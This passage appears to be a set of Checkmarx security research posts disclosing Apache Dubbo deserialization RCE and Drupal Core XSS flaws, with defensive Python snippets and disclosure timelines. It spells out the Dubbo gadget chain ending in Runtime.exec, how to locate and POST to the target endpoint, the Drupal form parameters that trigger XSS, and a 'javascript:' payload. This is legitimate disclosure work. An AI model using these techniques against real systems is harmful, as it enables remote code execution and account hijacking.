The issue is glaring in Dubbo 2.7.3 and under because the gadget chain disclosed in the previous research relies on an outdated FastJSON, but that only scratches the surface of this attack. Other gadget chains may still exist within Dubbo’s internals, and most Dubbo instances rely on dependencies beyond those bundled with the software. That wider dependency ecosystem allows similar forms of exploitation to persist until a robust whitelist solution is used within Dubbo’s internals.
At present, it is safe to assume that many (and probably most) instances of Dubbo <= 2.7.3 are vulnerable to remote code execution via deserialization of untrusted data, while any Dubbo version under 2.7.8 has some form of unsafe deserialization in the Dubbo Protocol pipeline. Version 2.7.9 added a configuration flag to prevent “chosen deserializer” attacks such as this one. Whether a given instance is exploitable depends on gadget availability, which is always a likely possibility.
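The whitelisting with class resolution look-ahead called for above can be illustrated outside of Java. The following is a minimal sketch using Python's pickle, where overriding `find_class` plays a role analogous to overriding `ObjectInputStream.resolveClass`. The allowlist contents and the names `AllowlistUnpickler` and `safe_loads` are hypothetical, and this is not the fix Dubbo shipped.

```python
import io
import pickle
from collections import OrderedDict

# Hypothetical allowlist: the only (module, class) pairs this service expects.
ALLOWED = {("collections", "OrderedDict")}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Runs when the stream names a class, before anything is instantiated,
        # so an unexpected class is rejected ahead of any of its code running.
        if (module, name) not in ALLOWED:
            raise pickle.UnpicklingError(f"class not allowed: {module}.{name}")
        return super().find_class(module, name)


def safe_loads(data):
    """Deserialize bytes, refusing any class outside the allowlist."""
    return AllowlistUnpickler(io.BytesIO(data)).load()
```

Usage: `safe_loads(pickle.dumps(OrderedDict(a=1)))` returns the mapping, while a stream that references any other class raises `pickle.UnpicklingError`. The design choice is to deny by default, so a newly added dependency cannot silently widen the set of reachable gadgets.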

Recommendations

  • Upgrade from Alibaba Dubbo to Apache Dubbo; Alibaba Dubbo does not appear to be officially maintained any longer
  • Update Apache Dubbo to its latest version
  • Never import unnecessary Dubbo packages, e.g. dubbo-serialization-kryo where Kryo is not actively used, to reduce the attack surface of the RMI interface

Disclosure Timeline

2/5/20 – Disclosure of Dubbo RCE Deserialization Exploit
2/19/20 – Reminder #1 to Apache Security Team
4/6/20 – Reminder #2 to Apache Security Team
7/27/20 – Reminder #3 to Apache Security Team
1/22/21 – First Acknowledgement of Issue
2/26/21 – Fix Released
6/4/21 – Public Disclosure

Apache Package Versions

Deserialization RCE with FastJSON Gadget:
Vulnerable package: org.apache.dubbo.dubbo <= 2.7.3
Requirements:
org.apache.dubbo.dubbo-common <= 2.7.9
org.springframework.spring-web – 5.3.4
Deserialization vulnerability without FastJSON Gadget, requires additional deserialization gadget in scope:
Vulnerable package: org.apache.dubbo.dubbo <= 2.7.6 – implementation dependent
Requirements:
org.apache.dubbo.dubbo-common <= 2.7.9
dubbo-serialization-kryo AND/OR dubbo-serialization-fst – <=2.7.9

Alibaba Package Versions

Despite certain signs of life, this is no longer officially maintained – all Alibaba Dubbo resources now point to Apache Dubbo.
Deserialization RCE with FastJSON Gadget:
Vulnerable package: com.alibaba.dubbo <= 2.6.7
Requirements:
com.alibaba.dubbo-serialization-kryo OR com.alibaba.dubbo-serialization-fst <= 2.6.7
org.springframework.spring-web – 5.3.4
Deserialization vulnerability without FastJSON Gadget, requires additional deserialization gadget in scope:
Vulnerable package: com.alibaba.dubbo <= 2.6.9
Requirements:
com.alibaba.dubbo-serialization-kryo OR com.alibaba.dubbo-serialization-fst <= 2.6.9
org.springframework.spring-web – 5.3.4

Final Words

Disclosures like this are part of the Checkmarx Security Research Team’s efforts to drive changes in software security practices. Checkmarx is committed to analyzing open source packages to help development teams build and deploy more secure software.

Drupal Core: Behind the Vulnerability
https://checkmarx.com/blog/drupal-core-behind-the-vulnerability-part-2-defacement-stored-xss-and-self-xss/
Wed, 02 Dec 2020 08:12:36 +0000

As you may recall, back in June, Checkmarx disclosed multiple cross-site scripting (XSS) vulnerabilities impacting Drupal Core, listed as CVE-2020-13663, followed by a more technical breakdown of the findings in late November. Today, we’re releasing details surrounding additional, new vulnerabilities (CVE-2020-13669) uncovered in Drupal Core as part of our continued research of the open source CMS platform. All research was conducted and reported to Drupal by Dor Tumarkin of Checkmarx.

CVE-2020-13669 – Overview

Drupal Security Risk: Moderately Critical https://www.drupal.org/sa-core-2020-010
Vulnerable versions:

  • Drupal 8.8 – before 8.8.10
  • Drupal 8.9 – before 8.9.6
  • Drupal 9 – before 9.0.6
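For anyone checking an inventory against the ranges above, a minimal sketch of the comparison follows. It assumes plain numeric version strings such as "8.9.5" (no "-rc" or "-dev" suffixes), and the function names are hypothetical.

```python
# First fixed release per affected branch, as listed above.
FIXED_IN = {(8, 8): (8, 8, 10), (8, 9): (8, 9, 6), (9, 0): (9, 0, 6)}


def parse_version(version):
    """Turn '8.9.5' into (8, 9, 5) so versions compare numerically, not as text."""
    return tuple(int(part) for part in version.split("."))


def is_vulnerable(version):
    """True or False for a listed branch; None when the branch is not listed."""
    parsed = parse_version(version)
    fixed = FIXED_IN.get(parsed[:2])
    if fixed is None:
        return None
    return parsed < fixed
```

Comparing tuples rather than strings matters here: as text, "8.8.9" sorts after "8.8.10", which would wrongly mark a vulnerable release as patched.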

Impact Summary

  • Inject malicious code in webpages via Cross-Site Scripting to:
    • Hijack user accounts
    • Inject malicious web-content, such as malicious login or payment forms
  • Deface a page to hide its contents
  • Redirect users to a website of an attacker’s choice, allowing them to abuse users’ trust in the victim website

CVE-2020-13669 – FigCaption Widget – Self-XSS, Stored DOM Manipulation, and XSS Potential

Vulnerability Proof of Concept (PoC)

The Figure Caption Widget (“FigCaption”) allows even basic content contributors with Basic HTML content privileges to insert a caption into their content. It is bundled with Drupal Core’s default CKEditor.
The raw HTML of such a caption would be of the following form:


Once submitted or rendered, this HTML is morphed into an entire HTML tree that presents the image inside CKEditor. However, the “data-caption” attribute may itself contain HTML, which is then rendered, and suffers from multiple issues as follows:

  • A lack of coherence/consistency between HTML attribute whitelists for the general CKEditor and internal FigCaption HTML, which allows the HTML inside FigCaption to contain arbitrary attributes, allowing:
    • Injecting arbitrary attributes and classes into <a> HTML tags, such as classes whose CSS covers the entire page, which permanently defaces pages and redirects visitors to a site of the attacker’s choosing (it should be noted that “on*” event attributes, such as “onclick”, are still properly sanitized)
    • Bypassing certain sanitizing behavior which could lead to XSS, given more widgets in the ecosystem, such as inserting the “javascript:” scheme into attributes that generally sanitize this scheme
  • A lack of sanitization when rendering in preview mode, allowing injecting <script> tags, which leads to self-XSS

Vulnerabilities Breakdown and Potential Implications

The issue affects the DOM in multiple ways, both stored and reflected from the DOM. All issues here pertain to the picture caption plugin, which the Drupal team added on top of CKEditor.

Self-XSS PoC

Self-XSS occurs when users copy values into a CKEditor instance. This requires a much more involved user in an attack scenario—the user needs to copy and paste content into the page.
Copying the following payload and switching to an HTML view (in vanilla Drupal Core, by clicking the “Source” button) would result in XSS:

Page Defacement with Redirection – Stored DOM Manipulation PoC

The above self-XSS is sanitized by the server when submitted, as the caption itself has a separate server-side component for sanitization. However, this creates an inconsistency—two components provide dissimilar sanitization. The major issue is that sanitization outside of the caption for “Basic HTML” mode only allows the following tags and attributes:

While the server-side sanitizer allows only the same tags, it does not offer any sanitization for attributes beyond normal XSS sanitization (on* JS events, removing “javascript:” prefixes from attribute values, some style attributes). This allows injecting far more than just the basic HTML tags—classes can now be used to get styles, data-* attributes can be used to power certain widget functionality, and more.
For example, consider the following defacement which injects a clickable redirection button:


This allows injecting buttons into HTML UIs, which can redirect to other websites. This can be made even worse by adding the “joyride-modal-bg” class to cover the whole page:


Adding the “joyride-modal-bg” class to an “a” tag will turn the entire page into a gray block on top of all the content, as per “joyride-modal-bg”’s CSS properties. By having an “a” element cover the whole page, clicking anywhere on that element would redirect to an external website of an attacker’s choice as declared in “src”. This would allow attackers to deface the website or conduct phishing attacks by impersonating the website of origin, even from the lowly Basic HTML content adding permission.

The Broken Widget – Potential Stored XSS PoC

A potential exploit also exists in creating a partial widget. It is not based on the widget’s form while it is edited in CKEditor, but on injecting the HTML product of a widget back into CKEditor. The product of a widget is the HTML generated by it, rather than the HTML fed to it:

As the previous exploits show, by combining the ability to add some benign HTML tag such as <em>, but with widget “data-*” and class attributes, an attacker is able to construct partial or broken widgets, which trigger when the page renders. Since widgets rewrite parts of the DOM, and trigger certain JS methods, this may allow a downstream DOM XSS.
For example, the following PoC, based on widget attributes, would trigger a broken widget from within the data-caption when viewed as Drupal content:

However, when browsing back to the edit view of this Drupal node, some of the broken widget’s functionality will trigger. The broken widget will read the value “src” in data-cke-widget-data’s JSON, and use it to populate the HTML attribute “src” inside the widget upon rendering the above payload in editor view, after it has been stored. This allows storing a payload that replaces the “src” attribute in the “img” tag with “javascript:alert(“XSS”)”:

This demonstrates that widget flow can be triggered from broken widgets to populate attributes, bypassing URL scheme sanitizers by inserting dangerous values into attributes after the page has already rendered.
The payload <img src=javascript:[code] > only functions in older browsers; Chrome complains about the URL scheme, while Firefox, Edge, and the latest IE ignore it outright. However, note that if an appropriate widget were in scope that made it possible to overwrite <a href> or <iframe src> in this way, it would be possible to store a DOM XSS payload here. Given additional widgets in a slightly less barebones ecosystem than standalone Drupal Core, a stored XSS is a very likely possibility using this vector.
Overall, an issue clearly exists in containment. It is possible to escape a restrictive Basic HTML sandbox to a looser one which allows injecting classes, ids and arbitrary data attributes, and store dangerous HTML in the most basic Drupal ecosystem.
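Since the broken widget writes the attribute after the stored markup has already been sanitized, a scheme check only helps if it runs at the moment the value is assigned. The following minimal Python sketch shows such a check; the allowlist of schemes and the function name are assumptions, and it is not Drupal's or CKEditor's implementation.

```python
from urllib.parse import urlsplit

# Assumed allowlist of schemes that may appear in src/href values.
SAFE_SCHEMES = {"http", "https", "mailto"}


def is_safe_url(value):
    """Accept relative URLs and allowlisted schemes; reject everything else."""
    # Whitespace and control characters can be used to disguise a scheme,
    # so drop them before looking at it.
    cleaned = "".join(ch for ch in value if ch > " " and ch != "\x7f")
    scheme = urlsplit(cleaned).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES
```

An allowlist is used rather than a "javascript:" blocklist so that other script-capable or unexpected schemes are rejected as well. Note that protocol-relative URLs such as "//host/path" have no scheme and pass this check.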

Summary of Disclosure and Events

Unlike the previously disclosed issue (CVE-2020-13663), CVE-2020-13669 actually covers two distinct vulnerable elements. The FigCaption widget, and Drupal widgets in general, are both client-side and server-side mechanisms, which requires the client and server implementations to behave identically. The fixes for these two mechanisms, while completely disparate, involved the same basic approach: applying the restrictive whitelists of Basic HTML mode to the whitelist within the image caption, so that attackers cannot access more HTML functionality and thus breach the HTML sandbox.
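The idea of holding caption HTML to the same per-tag attribute whitelist as the surrounding content can be sketched as follows. This is a minimal Python illustration using the standard library's HTML parser; the allowlist contents and the names `CaptionSanitizer` and `sanitize_caption` are hypothetical, and the code is not Drupal's actual fix. It filters tags and attributes only and does not validate URL schemes.

```python
from html import escape
from html.parser import HTMLParser

# Hypothetical allowlist in the spirit of a restrictive "Basic HTML" profile:
# tag -> attributes permitted on that tag.
ALLOWED = {"a": {"href"}, "em": set(), "strong": set(), "br": set()}


class CaptionSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # drop the tag; any text inside it is still emitted as text
        kept = [(k, v) for k, v in attrs if k in ALLOWED[tag] and v is not None]
        rendered = "".join(f' {k}="{escape(v, quote=True)}"' for k, v in kept)
        self.out.append(f"<{tag}{rendered}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))


def sanitize_caption(html):
    """Rebuild caption HTML keeping only allowlisted tags and attributes."""
    parser = CaptionSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)
```

With this profile, `<a href="https://example.com" class="joyride-modal-bg">go</a>` comes out as `<a href="https://example.com">go</a>`: the tag survives, but the class that made the defacement possible does not.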

Recommendation Summary

The fixes for these issues have been released, and it is highly recommended for all organizations to update their Drupal Core to the latest available version.

Timeline of Disclosure

18-Jun-20 – Drupal Self-XSS reported, followed by HTML defacement injection, and XSS prevention bypass via broken widgets
16-Sep-20 – Drupal Core releases new sub-versions across all major versions, mitigating CVE-2020-13669

Final Words

Drupal Core is a complicated piece of software with many content and system management features and a vast plugin ecosystem. It is no surprise that this complexity yields such vulnerabilities—particularly common web-vulnerabilities such as XSS.
To counterbalance this complexity, the Drupal Security Team takes a strong stance and ownership on securing open-source software. They are responsive, receptive, and thorough, which allows for both a quick and high-quality response to security issues being reported.
Disclosures like this are part of the Checkmarx Security Research Team’s efforts to drive changes in software security practices. Checkmarx is committed to analyzing open source packages to help development teams build and deploy more secure software. Checkmarx’s database of open source libraries and vulnerabilities is cultivated by the Checkmarx Security Research Team, empowering CxSCA with risk details, remediation guidance, and exclusive vulnerabilities that go beyond the NVD.

Drupal Core: Behind the Vulnerability
https://checkmarx.com/blog/drupal-core-behind-the-vulnerability-part-1-reflected-xss/
Thu, 19 Nov 2020 07:59:34 +0000

Earlier this year, the Checkmarx Security Research Team conducted an investigation of the new version of Drupal Core (Drupal 9) – a content management system (CMS) written in PHP – uncovering several interesting issues whose technical details are worth discussing openly.
This article covers the technical facets of CVE-2020-13663 that were made public by Checkmarx in June 2020, but whose details were never discussed publicly, and serves as part 1 of breaking down the vulnerabilities identified during our Drupal research. The issues outlined below were resolved by the Drupal security team shortly after we reported them.

CVE-2020-13663 – Overview

Drupal Security Risk: Critical https://www.drupal.org/sa-core-2020-004
Vulnerable versions:

  • Drupal 7 – before 7.72
  • Drupal 8.8 – before 8.8.8
  • Drupal 8.9 – before 8.9.1
  • Drupal 9 – before 9.0.1

NOTE: This issue was also reported internally by Samuel Mortenson of the Drupal Security Team.

CVE-2020-13663 – Reflected DOM XSS in Rejected Forms

Vulnerability Proof of Concept (PoC)

The following code would recreate the issue on any vulnerable version of Drupal Core, so long as Basic Page functionality exists and URL rewrites are not altered. It will affect any user who is authenticated and has permissions to both add the page and use a Full HTML mode. Otherwise, values such as form “action” and form_id “value” may require alteration:

An authenticated user with HTML content creation permissions will observe the result of script execution:

While Cross-site Request Forgery (CSRF) mitigation prevents the form from going through and adding a new page, Drupal attempts to fail gracefully so that content that has been submitted is not lost because a security mechanism rejected it. A message is shown to indicate the form is rejected, but the user may still retrieve its contents from the form:

The posted content is reflected in the page to allow users to copy it to a valid form in a CKEditor view. The CKEditor view, like a Microsoft Word document, contains live elements such as images, figures, and more. These live elements are rendered HTML elements, which, in theory, could contain malicious code. While CKEditor does generally account for this by offering some protection against this type of DOM XSS and specifically strips script tags, the way it is configured on Drupal allows bypassing that by planting the script tags inside an iframe.

Vulnerability Breakdown

A reflected XSS vulnerability occurs when an attacker can provide values to a victim via a crafted URL or webpage, which, once interacted with by the victim, passes tainted parameters to a webpage in the user’s browser. If the user is authenticated, these scripts can then interact with the webpage from within the user’s browser, session context, and on the user’s behalf.
A DOM XSS implies the DOM itself, within the user’s browser, programmatically retrieves tainted values from within itself and populates the insecure page with these tainted values, essentially parsing HTML containing an XSS payload, or injecting JavaScript into itself. Reflected XSS implies that the generated page contains user input from the request that prompted it. In this case, it is both:

User input is reflected in the expired form error page, and CKEditor then uses this payload to populate itself:

Note that this mutates the DOM somewhat; the script tag is removed from the iframe, and rendered right next to it.
The vulnerable forms here are the node/add/[type] and node/[node-id]/edit endpoints—when POSTing to these pages, with the correct parameters:

  • form_id parameter: e.g. node_article_form, node_page_form, which are the default form types
  • A parameter name to inject a value into: in both default cases here (“Article” and “Basic Page”), this is body[0][value], but generally, a CKEditor element can be derived from the field’s classes, e.g., text-formatted or field-type-text-with-summary to realize it is a component generated by CKEditor, and field-name-body to get the field’s name
  • Forcing format mode to “Full HTML” for the payload to trigger, e.g., body[0][format]; otherwise, this will simply be the current value, which could be restricted and block out the payload

Other variables for CSRF protection and expiry checks can be left out or left empty; the attacker cannot supply valid values for these, and when they are wrong or missing, Drupal reflects the expired form, which triggers the XSS.
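One way to close this class of reflection, at the cost of the graceful-failure behavior described earlier, is to refuse to echo posted values whenever the token check fails. The Python sketch below illustrates that trade-off; the function name is hypothetical, the "form_token" field name is an assumption, and this is not presented as the fix Drupal shipped.

```python
import hmac


def values_to_render(posted, expected_token):
    """Return the posted fields to reflect, or nothing if the token is invalid."""
    token = posted.get("form_token", "")
    # Constant-time comparison; bytes are used so non-ASCII input cannot raise.
    if not hmac.compare_digest(token.encode(), expected_token.encode()):
        return {}  # untrusted submission: reflect none of its content
    return {key: value for key, value in posted.items() if key != "form_token"}
```

A forged cross-site request cannot carry a valid token, so under this policy its body never reaches the editor; the cost is that a legitimate user with an expired form loses the submitted draft.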

  • Inject malicious code into webpages via Cross-Site Scripting to:
    • Hijack user accounts
    • Inject malicious web-content, such as malicious login or payment forms

Summary of Disclosure and Events

Once the issues were reported, the Drupal Security Team invited Checkmarx to its discussions on fixing them, and was very receptive to the report and subsequent analysis. The team was quick to acknowledge the flaw and repair it.

Timeline of Disclosure

07-Jun-20 – Drupal Security Team notified of DOM XSS (CVE-2020-13663) via e-mail
09-Jun-20 – Drupal Security Team responds with invitation to consult on resolving this issue, as it was also internally identified by Samuel Mortenson of the Drupal Security Team
17-Jun-20 – Drupal Core releases new sub-versions across all major versions, mitigating CVE-2020-13663

Checkmarx Research: Apache Dubbo 2.7.3 – Unauthenticated RCE via Deserialization of Untrusted Data (CVE-2019-17564)
https://checkmarx.com/blog/apache-dubbo-unauthenticated-remote-code-execution-vulnerability/
Wed, 19 Feb 2020 10:00:56 +0000

Executive Summary

Having developed a high level of interest in serialization attacks in recent years, I decided some months back to put some effort into researching Apache Dubbo. Dubbo, I learned, deserializes many things in many ways, and its usage worldwide has grown significantly since its adoption by the Apache Foundation.

Figure 1 – Dubbo Architecture
According to a mid-2019 press-release, Dubbo is “in use at dozens of companies, including Alibaba Group, China Life, China Telecom, Dangdang, Didi Chuxing, Haier, and Industrial and Commercial Bank of China, among others”. In the same press-release, Apache announced Dubbo being promoted into an Apache Top-Level Project.


Figure 2 – Dubbo Users, According to Apache Dubbo Website
I discovered that Apache Dubbo providers and consumers using versions <= 2.7.3 of Dubbo, when configured to accept the HTTP protocol, allow a remote attacker to send a malicious object to the exposed service, which results in Remote Code Execution. This occurs with no authentication, and minimal knowledge on the attacker’s part is required to exploit this vulnerability. Specifically, only the exploit described herein and a URL are required to successfully exploit it on any Dubbo instance with HTTP enabled. A proof of concept video also accompanies this report.
An attacker can exploit this vulnerability to compromise a Dubbo provider service, which is expecting remote connections from its consumers. An attacker can then replace the Dubbo provider with a malicious Dubbo provider, which could then respond to its consumers with a similar malicious object – again resulting in Remote Code Execution. This allows an attacker to compromise an entire Dubbo cluster.
The root cause of this issue is the use of a remote deserialization service in Spring Framework, whose documentation explicitly recommends against using it with untrusted data, in tandem with an outdated library that contains a lesser-known gadget chain enabling code execution. The combination of unsafe deserialization of untrusted data and a gadget chain is what bridges the gap between remote access and remote unauthenticated code execution.
Credits are in order to Chris Frohoff and Moritz Bechler for their research and tools (ysoserial and marshalsec), as some of their code was used in the gadget chain, and their research laid the foundation for this exploit.

Severity

Checkmarx considers this vulnerability to have a CVSS score of 9.8 (Critical), since it is an unauthenticated remote code execution vulnerability that provides privileges at the Dubbo service’s permission level, allowing complete compromise of that service’s confidentiality, integrity, and availability.
While not all Dubbo instances are configured to use the HTTP protocol, instances with known vulnerable versions that are configured to use this protocol would be trivially vulnerable, given minimal and readily available information, which is the URL to the vulnerable service. This service URL would be publicly available within the network, via services such as a registry (e.g. Zookeeper), and is not considered secret or confidential.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:U/RC:C/CR:H/IR:H/AR:H
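As a worked check of the 9.8 figure, the base metrics in the vector above can be run through the CVSS v3.0 base score equations. The Python sketch below covers only the Scope: Unchanged case and ignores the temporal and environmental metrics in the vector; the function names are hypothetical.

```python
import math

# CVSS v3.0 base metric weights (Scope: Unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value):
    """Round up to one decimal place, as the specification requires."""
    return math.ceil(value * 10) / 10


def base_score(vector):
    """Compute the v3.0 base score from a vector string (Scope: Unchanged only)."""
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    if metrics.get("S") != "U":
        raise ValueError("this sketch handles Scope: Unchanged only")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))
```

For this vector the impact sub-score is about 5.87 and the exploitability sub-score about 3.89; their sum, roughly 9.76, rounds up to 9.8.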

Specifications

What’s Going On?

Unsafe deserialization occurs within a Dubbo application which has HTTP remoting enabled. An attacker may submit a POST request with a Java object in it to completely compromise a provider instance of Apache Dubbo, if this instance enables HTTP.
The Dubbo HTTP instance attempts to deserialize data within the Java ObjectStream, which contains a malicious set of classes, colloquially referred to as a gadget chain, whose invocation results in the execution of malicious code. In this instance, the malicious code in question allows arbitrary OS commands, and the invocation of the gadget chain occurs when an internal toString call is made in the Dubbo instance on this gadget chain, during exception creation.

Recreating the Issue

An attacker can submit a POST request with a malicious object to a bean URL for an Apache Dubbo HTTP Service, which would result in remote code execution. The bean, in this case, is the interface implementation class bound by Spring to a given Dubbo protocol endpoint. The bean is wired to a URL, and the request body for the bean contains an HTTP Remote Invocation used to determine which bean method is invoked, and with what parameters.
Once an attacker has the bean’s URL, all they have to do to exploit this vulnerability is to submit a malicious gadget chain via a standard POST request.
A new gadget chain which allows remote OS command execution was found in the scope of vanilla Apache Dubbo with Dubbo-Remoting-HTTP, if the HTTP service and protocol are enabled.

Recreating a Victim Dubbo HTTP Instance for PoC

Follow this guide:

  1. Follow the Official Apache Dubbo Quick-Start guide until a functioning provider and registry are successfully created
  2. Enable Dubbo HTTP service – Edit dubbo-demo-provider.xml – change dubbo:protocol name to “http”

Targeting a Vulnerable Instance

To trigger this vulnerability, an attacker must identify a URL to the Dubbo HTTP bean. URL addresses are generally not confidential or privileged, since they can be obtained from Dubbo service registries (e.g., Zookeeper), from multicasts, and, in the absence of a well-deployed HTTPS pipeline, via Man-in-the-Middle attacks.

Triggering Vulnerability PoC

Review Appendix 1 for functioning POC code. Note that variables such as the IP address of the Dubbo instance require modification inside this code.
An attacker requires the same dependencies as the Dubbo HTTP Service, stated above. In this PoC, com.nqzero:permit-reflect was used for reflection features required during serialization, and org.apache.httpcomponents.httpclient was used to send the malicious gadget to the HTTP service. To trigger the vulnerability, a new gadget chain was engineered using means available within the class space of Apache Dubbo and JDK.
This gadget chain uses the following components:

  • org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter – this is the deserialization entry point, deserializing the request body. Deserialization of HashMaps, and Java Collections in general, invokes their value insertion methods. In this case, this will invoke HashMap.putVal(h,k,v).
  • A HashMap of two org.springframework.aop.target.HotSwappableTargetSource objects, one containing a JSONObject as a target, and another containing a com.sun.org.apache.xpath.internal.objects.XString object as a target
    • HotSwappableTargetSource objects always return the same hashcode (class.hashCode()), which forces HashMap.putVal(h,k,v) into running deeper equality checks on HashMap keys, triggering equals() on its contents – the two HotSwappableTargetSource member objects
    • HotSwappableTargetSource equality checks validate if the target objects inside HotSwappableTargetSource are equal; in this case – an XString and a JSONObject
    • The XString.equals(object) triggers a call equivalent to this.toString().equals(object.toString()) call, which would trigger JSONObject.toString()
  • JSONObject – org.apache.dubbo.common.json.JSONObject, which is a deprecated class within Dubbo, is used to handle JSON data. If a JSONObject.toString() is invoked, the super method JSON.toJSONString() will be invoked
    • A toJSONString() call will attempt to serialize the object into JSON using JSONSerializer, which invokes a serializer. This serializer is generated using the ASMSerializerFactory. This factory attempts to serialize all getter methods in objects stored inside JSONObject.
  • TemplatesImpl partial gadget – this known gadget is utilized by many gadget chains in ysoserial and marshalsec. This partial gadget generates a malicious com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl object. If this object’s newTransformer() method is invoked, the chain will execute java.lang.Runtime.getRuntime().exec(command)
    • Since JSONObject.toJSONString attempts to serialize all getter methods, the method TemplatesImpl.getOutputProperties() is also invoked
    • Internally, TemplatesImpl.getOutputProperties() method invokes newTransformer() to get the properties from a generated transformer
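The first half of this chain, where rebuilding a hash map is enough to run code in an unrelated object, is not specific to Java. The harmless Python analogy below uses stand-in classes (all names hypothetical): a wrapper with a constant hash, a string-like target whose equality compares string forms, and a target whose string conversion has a side effect.

```python
calls = []


class Wrapper:
    """Stand-in for HotSwappableTargetSource: constant hash, equality delegates to targets."""

    def __init__(self, target):
        self.target = target

    def __hash__(self):
        return hash(Wrapper)  # identical for every instance, like class.hashCode()

    def __eq__(self, other):
        return isinstance(other, Wrapper) and self.target == other.target


class StringLike:
    """Stand-in for XString: equality compares the string forms of both sides."""

    def __init__(self, value):
        self.value = value

    def __str__(self):
        return self.value

    def __eq__(self, other):
        return str(self) == str(other)


class SideEffect:
    """Stand-in for the JSONObject: converting it to a string runs further code."""

    def __str__(self):
        calls.append("SideEffect.__str__")
        return "{}"


def rebuild_map(keys):
    """Mimic a deserializer re-inserting keys into a hash map one by one."""
    table = {}
    for key in keys:
        table[key] = True
    return table
```

Calling `rebuild_map([Wrapper(StringLike("x")), Wrapper(SideEffect())])` leaves one entry in `calls`: the colliding hashes force an equality check, which delegates to the targets, which converts the second target to a string. Nothing in the caller asked for that conversion, which is the property a gadget chain exploits.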


Figure 3 – Exploit Bytecode
Once newTransformer is invoked, a flow is complete between deserialization at HttpInvokerServiceExporter.doReadRemoteInvocation(ObjectInputStream ois) and java.lang.Runtime.getRuntime().exec(command), thus enabling remote code execution.
The final gadget chain’s structure is:

Once the vulnerability is triggered, and malicious code is executed (and, in the PoC, an instance of calc.exe pops on the server), an exception will be thrown. However, the application will continue to function as intended otherwise, resulting in stable exploitation for the given gadget chain.

Figure 4 – PoC Outcome

Why Is This Happening?

Dubbo HTTP remoting is in play when a Dubbo application is created using the HTTP protocol over the Spring framework. Dubbo naively invokes a known-vulnerable class in Spring, which deserializes user input using the extremely vulnerable (and nigh indefensible) ObjectInputStream. An attacker may provide a payload which, when deserialized, triggers a cascade of objects and method invocations which, given a vulnerable gadget chain in deserialization scope, may result in Remote Code Execution, as demonstrated in this POC.
The vulnerable Spring Remoting class is HttpInvokerServiceExporter. From the Spring documentation:
“WARNING: Be aware of vulnerabilities due to unsafe Java deserialization: Manipulated input streams could lead to unwanted code execution on the server during the deserialization step. As a consequence, do not expose HTTP invoker endpoints to untrusted clients but rather just between your own services. In general, we strongly recommend any other message format (e.g. JSON) instead.”
This is exactly what happens with Dubbo HTTP Remoting. By using the Dubbo HTTP remoting module, an HTTP endpoint is exposed that receives an HTTP request of the following structure:

  • A POST request
    • Whose URL refers to the packagename.classname for the bean exposed by the provider, which is wired by Dubbo to the actual package and class
    • Whose body is a stream of an object, as serialized by ObjectOutputStream

The HttpProtocol handler parses the incoming org.apache.dubbo.rpc.protocol.http.HttpRemoteInvocation object using the HttpInvokerServiceExporter, which, internally, utilizes ObjectInputStream to deserialize it. HttpRemoteInvocation contains an invocation call to a certain method, and the arguments to pass to this method. However, with ObjectInputStream, any arbitrary serialized Java object can be passed, which would then be deserialized in an insecure manner, resulting in unsafe deserialization.
ObjectInputStream, on its own without any external classes, is vulnerable to memory exhaustion and heap overflow attacks, when it is used to deserialize malformed nested objects.
If an ObjectInputStream deserializable gadget chain is available within code scope that allows code or command execution, an attacker can exploit this to craft an object that results in Remote Code Execution. Such a gadget chain was found and exploited.

Tainted Code Flow

Within the Dubbo HTTP service, the following occurs:

  1. JavaX HttpServlet is invoked with user input
  2. This input is passed to the Dubbo remoting dispatcher, DispatcherServlet, which uses an HttpHandler implementation, InternalHandler (an internal class in HttpProtocol), to handle the request and return a response
  3. InternalHandler.handle() creates the insecure HttpInvokerServiceExporter in line 210 and invokes it on the request in line 216
  4. From there, internal calls in HttpInvokerServiceExporter finally pass the request stream into an ObjectInputStream in line 115, which is then internally read by the handler’s superclass RemoteInvocationSerializingExporter in line 144.
  5. The gadget chain is then triggered by the ObjectInputStream readObject operation

Required Prior Knowledge for Exploitation

The only piece of knowledge required to exploit an open HTTP port to a Dubbo HTTP Remoting service is the name of a Remote Invocation interface’s package and class. This information is used to craft the URL to which a serialized malicious object must be submitted, which is standard Spring bean behavior. For example, if the remoted interface’s package is named “org.apache.dubbo.demo” and the interface being remoted is named “DemoService”, an attacker needs to POST an object serialized by ObjectOutputStream to the URL “https://domain:port/org.apache.dubbo.demo.DemoService”. This information can be obtained with various methods:

  • Querying a Zookeeper for available beans, if Dubbo uses a Zookeeper as a registry
  • Observing HTTP traffic via Man-in-the-Middle attacks
  • Spoofing is also likely to be possible if Dubbo uses a multicast to find services (this was not tested)
  • Other means, such as logging services

No additional information is required to perform the attack.
It should be noted that URL paths are generally not considered confidential information, and hiding a vulnerable web service behind an allegedly unknowable URL path would constitute security through obscurity.

Summary of Disclosure and Timeline

When the vulnerability was first discovered, the Checkmarx research team ensured that they could reproduce the process of easily exploiting it. Once that was confirmed, the research team responsibly notified Apache of their findings.

Disclosure Timeline

  • 13/8/2019 – Checkmarx provides full disclosure to security@apache.org, issue forwarded to security@dubbo.apache.org
